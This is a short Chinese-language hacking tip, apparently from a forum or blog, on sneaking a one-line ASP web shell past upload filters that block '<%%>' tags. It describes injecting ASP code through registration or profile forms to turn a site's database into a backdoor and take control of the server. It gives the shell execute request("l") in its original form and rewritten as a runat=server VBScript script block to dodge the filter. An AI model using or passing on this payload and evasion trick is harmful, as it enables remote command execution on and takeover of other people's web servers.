一句話***中突破〈%%〉標記過濾

突破〈%%〉標記過濾
很多時候我們可以通過在註冊表單或者用戶信息修改表單中，插入簡短的ASP代碼，使網站ASP數據庫變成爲一個ASP***，然後進一步***控制服務器。不過在上傳代碼過程中，許多網頁程序都不允許包含〈%%〉標記符號的內容的文件上傳。
這樣就有好多SHELL不能上傳上去了。可以採用下面的方法解決。以藍屏最小ASP***爲例。
原來的程序代碼是“〈%execute request("l")%>", 我們可以把它的標籤換下來，改成"<scriptlanguage=VBScript runat=server>execute request("l")</Script>".這樣就避開了使用〈%%〉，保存爲.ASP,程序照樣執行。效果是一樣的